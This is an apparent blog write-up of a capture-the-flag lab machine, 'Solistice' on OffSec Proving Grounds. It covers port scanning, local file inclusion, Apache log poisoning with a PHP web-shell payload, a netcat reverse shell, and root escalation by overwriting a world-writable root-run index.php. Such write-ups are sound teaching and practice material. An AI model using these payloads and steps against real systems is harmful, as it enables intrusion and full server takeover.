OffSec PG - Solistice


Machine IP →

Network Scan

Nmap scan → nmap -A -Pn -p- -T4 -o nmap.txt

OS Detection → OS: Linux; CPE: cpe:/o:linux:linux_kernel

PortServiceOther details (if any)
21FTPpyftpdlib 1.5.6
22SSHOpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
25SMTPExim smtpd
80HTTPApache httpd 2.4.38 ((Debian))
2121FTPpyftpdlib 1.5.6 → Anonymous Login Allowed
3128HTTP ProxySquid http proxy 4.6
8593HTTPPHP cli server 5.5 or later (PHP 7.3.14-1) → PHPSESSID HTTPOnly flag not set
54787HTTPPHP cli server 5.5 or later (PHP 7.3.14-1)

Web Scan

GoBuster scan → gobuster dir -u -w /home/tanq/installations/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php

Nothing interesting was revealed in any of the ports.



The web server running at port 8593 has the ability to list books via PHP. This is done via a get parameter. Trying LFI with ../../../../../../etc/passwd confirms LFI and gives the result of the file to list possible users which includes www-data, miguel and root.

Transition LFI to Apache log poisoning

The default apache error logs are located at /var/log/apache2/error.log. This is readable on the browser because of the LFI vulnerability. Therefore, adding php code to an attempt would add it to the error log and subsequently render it on the webpage.

Therefore visiting the url<?php system($_GET['cmd']);?> should add it to the error log, thereby giving an RCE for the get request parameter in the LFI url. The access via the browser encodes the special characters, therefore a burp repeater request modification should do the trick.

Exploiting the RCE

With the php payload injected into the access log, the lfi url can be modified to add the parameter value for the cmd variable. Testing with id works. Next, this can used to test if nc, wget, etc. exist on the system which can be used to create a shell payload. This is the RCE on the server.

Both netcat and bash shell exist, therefore sending a payload nc -e /bin/bash 3002 with a listener active on the local machine gives a shell with the user www-data.

Privilege Escalation

Looking at the setuid files and directories using find / -perm -u=s 2>/dev/null, there is a server running at /var/tmp/sv which is a directory that is owned by root and is world-writable.

This has an index.php file which just prints that the site is under construction. This cannot be observed from any of the ports enumerated above. Checked the status of this under processes using ps aux | grep root | grep sv. This confirms that the server is actually running, but on localhost only. Therefore, this php file can be edited to have a payload that connects back to the attacker machine to get a reverse shell. Due to the permissions, this would be the root shell.

The pentest monkey reverse shell is uploaded to the server and the contents of the index.php file are overwritten with them. Then the execution can be done as follows on the low privileged shell → curl http://localhost:57/index.php

This gives a shell as the root user and thus the root flag as well.

This post is licensed under CC BY 4.0 by the author.